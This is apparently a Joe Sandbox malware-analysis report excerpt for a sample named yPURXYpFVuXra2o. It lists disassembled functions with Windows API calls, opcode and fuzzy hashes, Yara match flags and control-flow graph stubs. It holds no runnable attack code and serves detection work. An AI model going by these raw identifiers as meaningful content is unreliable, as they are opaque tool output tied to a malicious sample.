                                                                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                                                                        • Opcode ID: d91486fe2ffad1751c79064d739bca1f1420cf6ca2fe6429d7d2e47adf0f17de
                                                                                                                                                                                                        • Instruction ID: 06b5fa4f77337b1b55011d1b34a447182765772a9380862f9c985b0d80157d3f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d91486fe2ffad1751c79064d739bca1f1420cf6ca2fe6429d7d2e47adf0f17de
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FF08CB1100149ABCB04DF98D884CE777A9FF88224B15868EF94897203C234D811CBA1
                                                                                                                                                                                                        Function 0041A48A Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 267 41a48a-41a4b9 call 41af60 NtClose
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                        • Opcode ID: a92b911e27f53ecf696d4d7a5ba2ab7028a837a26c91bb7b4133aea6172ab6b5
                                                                                                                                                                                                        • Instruction ID: 0318eddddf4dd3894c10c50b6b89b1645946d9807308f0d60e58d7719e790871
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a92b911e27f53ecf696d4d7a5ba2ab7028a837a26c91bb7b4133aea6172ab6b5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36E026362002046FC710DFE4DC45EE73768EF48310F14415AB91D87241C130E5118B90
                                                                                                                                                                                                        Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                        • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                                                                                                                                                                        Function 018429F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 63c398d760d03ade3b4e9e392ea36dc8ab08953614019bba3ff2f91acba65b3f
                                                                                                                                                                                                        • Instruction ID: 1fde31b2f8de285707022576c838fe67d07914005b5ca3a583614d83b2f67d5c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63c398d760d03ade3b4e9e392ea36dc8ab08953614019bba3ff2f91acba65b3f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6900225211000130645A55917045070046D7D6352351C426F6009550CD63189656121
                                                                                                                                                                                                        Function 01842B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 7cf5f150bd69d21dc2a2455324aa0d553cd8a7aeb2dd010c21ae0c1bdc80f712
                                                                                                                                                                                                        • Instruction ID: 3e478366c2a3ebe4f9c14447ae568926274bb31d1b32444f1992ba776d397009
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7cf5f150bd69d21dc2a2455324aa0d553cd8a7aeb2dd010c21ae0c1bdc80f712
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D90023120108812D6506159950474A0005D7D1302F55C816A9418658DC6A589957121
                                                                                                                                                                                                        Function 01842BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 6cdd02ade56b261c3edea995fa60842bc9a69c67055cadd871ee26476bad8857
                                                                                                                                                                                                        • Instruction ID: 748d8a03f8ff5693b449eca1bc6236d064cfe7ebcd9b406aeaa6c1dc2d8007af
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cdd02ade56b261c3edea995fa60842bc9a69c67055cadd871ee26476bad8857
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6590023120100412D640659965086460005D7E1302F51D416AA018555EC67589957131
                                                                                                                                                                                                        Function 01842B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 37791f41518c4e4a3598d573d8b5a2666ec2e926b6c5a602a422995961618fe2
                                                                                                                                                                                                        • Instruction ID: cf2e449eaa1d87c13aeb00c1d2afe769851e5a15bbc368588d83274e84b1552a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37791f41518c4e4a3598d573d8b5a2666ec2e926b6c5a602a422995961618fe2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A90023120100812D6C07159550464A0005D7D2302F91C41AA5019654DCA258B5D77A1
                                                                                                                                                                                                        Function 01842A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: c54c0ffa729fae6764676a0b3e7d35b7cbab6d6fa20ee7ea3a551d858f3c4594
                                                                                                                                                                                                        • Instruction ID: 9f8d81609e648d66672c021a5e1af21655f90e6638b7fbe2b5938f07397fd223
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c54c0ffa729fae6764676a0b3e7d35b7cbab6d6fa20ee7ea3a551d858f3c4594
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0890026120200013464571595514616400AD7E1302B51C426E6008590DC53589957125
                                                                                                                                                                                                        Function 01842DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: a5e06f581813ebfb4ca08d5691dfc4567ced6fe8c9c6a2cc2a746fa65b28d9ef
                                                                                                                                                                                                        • Instruction ID: e3f26242c5e00e0c71e328e5ffeb660fca19ce63f099b2582362ddc853d26e43
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5e06f581813ebfb4ca08d5691dfc4567ced6fe8c9c6a2cc2a746fa65b28d9ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7090022160100512D64171595504616000AD7D1342F91C427A6018555ECA358A96B131
                                                                                                                                                                                                        Function 01842DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 92eac56e424d6d041a21c8cb13a795a748d7337aab89cfd801d6ce1ae9ade658
                                                                                                                                                                                                        • Instruction ID: 86e2b21c147d77f51d8d122455caac1f9b48a985290090f07fae800cf60ac777
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92eac56e424d6d041a21c8cb13a795a748d7337aab89cfd801d6ce1ae9ade658
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C090027120100412D680715955047460005D7D1302F51C416AA058554EC6698ED97665
                                                                                                                                                                                                        Function 01842D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: f55abce274392c1a088a3cabb20ec3e46307f94c4429aad0836073a495a76bdf
                                                                                                                                                                                                        • Instruction ID: 0ff7a656cd2a0c2d3287691c3afbee01a9b466108a011146a3092e857cc0d43f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f55abce274392c1a088a3cabb20ec3e46307f94c4429aad0836073a495a76bdf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA90023120100423D651615956047070009D7D1342F91C817A5418558DD6668A56B121
                                                                                                                                                                                                        Function 01842CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: a293c4dd15c4eb28854db4a80db9686a1ef9171c44c799a5da6c8654789869a4
                                                                                                                                                                                                        • Instruction ID: b62990706f359f4381ac5d21231d2bf6ee81348b26fa35aa5e4dd456407db45c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a293c4dd15c4eb28854db4a80db9686a1ef9171c44c799a5da6c8654789869a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8900221242041625A85B15955045074006E7E1342791C417A6408950CC536995AE621
                                                                                                                                                                                                        Function 01842C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: d2e96add3d858df0f656cdc0daf6e58b567570dc11f1e9356ccf5b213e93cb68
                                                                                                                                                                                                        • Instruction ID: 61a4eba3dac293c38f0c499204ccfca7cfcb276c4a026fceed8cf90124797346
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2e96add3d858df0f656cdc0daf6e58b567570dc11f1e9356ccf5b213e93cb68
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0090022921300012D6C07159650860A0005D7D2303F91D81AA5009558CC925896D6321
                                                                                                                                                                                                        Function 01842C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 3510443a35794c3141500a108d91a9617bc1e548f83372171ec5ea3fd174103d
                                                                                                                                                                                                        • Instruction ID: 1354dddb6f3cca6dcfec5c1b4a71ee91cf9387ab2709555f6e17fce955638b85
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3510443a35794c3141500a108d91a9617bc1e548f83372171ec5ea3fd174103d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B90022130100013D680715965186064005E7E2302F51D416E5408554CD925895A6222
                                                                                                                                                                                                        Function 01842F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: c0ee5266d88622505227e056e16b6273ca0dd3c403094e3bb340c5e943623046
                                                                                                                                                                                                        • Instruction ID: 5d75ac9e60630b6695e9d2134140e2c95e70ff380bcbcf973a8e404367d12d48
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0ee5266d88622505227e056e16b6273ca0dd3c403094e3bb340c5e943623046
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C990022121180052D74065695D14B070005D7D1303F51C51AA5148554CC92589656521
                                                                                                                                                                                                        Function 01842EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: a7247dc8cba8096127e1cc333701f09ed3d48c1a65e39e4217f9997200b859c1
                                                                                                                                                                                                        • Instruction ID: 72f3344bf6ae07ac0f453914d540d63a37e2d78f589addcdbd1818d75546de73
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7247dc8cba8096127e1cc333701f09ed3d48c1a65e39e4217f9997200b859c1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A490043130140413D740715D5D1470F0005D7D1303F51C417F715C555DC735CD557571
                                                                                                                                                                                                        Function 01842ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 566b1b9ee5c20d06a5ab8c62f433421466bafab34cac64888f836c9235ad4c00
                                                                                                                                                                                                        • Instruction ID: a02bb60db6c2bcaf6b54a5642551d1645d745f37c6b3c66611cff3631e00ea18
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 566b1b9ee5c20d06a5ab8c62f433421466bafab34cac64888f836c9235ad4c00
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52900221601000524680716999449064005FBE2312751C526A598C550DC56989696665
                                                                                                                                                                                                        Function 01842E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 00c422170fe32a1317cb7e7243de127c0d746f7833aad4251901cdd93ff8bd73
                                                                                                                                                                                                        • Instruction ID: c5cb23df8d65f10769ae1cca4e295f5282f8e10bd517c094c72d2b5fe7237799
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00c422170fe32a1317cb7e7243de127c0d746f7833aad4251901cdd93ff8bd73
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9590026134100452D64061595514B060005D7E2302F51C41AE6058554DC629CD567126
                                                                                                                                                                                                        Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                                                                                                                        • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                                                                                                                                                                        Function 00408308 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59threadwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                        • API String ID: 1836367815-3372436214
                                                                                                                                                                                                        • Opcode ID: 3490635e178a175b37a2ce52e26ff2d3115ea5c230936db75ef3e7dfdacd4bd4
                                                                                                                                                                                                        • Instruction ID: 887a02576baec6626c14bd7377d200aa94d9529cad112a939728fc3438d376d7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3490635e178a175b37a2ce52e26ff2d3115ea5c230936db75ef3e7dfdacd4bd4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7401B531A8032C76E721AA959C42FEF7B6C5B40F55F044119FF04BA1C2EAB9690546EA
                                                                                                                                                                                                        Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 18 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                        • String ID: 6EA
                                                                                                                                                                                                        • API String ID: 1279760036-1400015478
                                                                                                                                                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                        • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                                                                                                                                                                        Function 0041A6AA Relevance: 3.0, APIs: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitFreeHeapProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1180424539-0
                                                                                                                                                                                                        • Opcode ID: 0bf6b081082fe953261e7cdb27cfc2632f87633dda88a5d4ae1c76f413030ead
                                                                                                                                                                                                        • Instruction ID: c57c1df092ea9a3cb1c161b16e705b742cc4401619ccc54a23c1d6211329ce16
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0bf6b081082fe953261e7cdb27cfc2632f87633dda88a5d4ae1c76f413030ead
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36F0AFB1640114BFD720DF65CC89FDB3768EF48790F108169B91CAB282C630E915CAF1
                                                                                                                                                                                                        Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 223 408310-40831f 224 408328-40835a call 41ca00 call 40acf0 call 414e50 223->224 225 408323 call 41be60 223->225 232 40835c-40836e PostThreadMessageW 224->232 233 40838e-408392 224->233 225->224 234 408370-40838a call 40a480 232->234 235 40838d 232->235 234->235 235->233
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
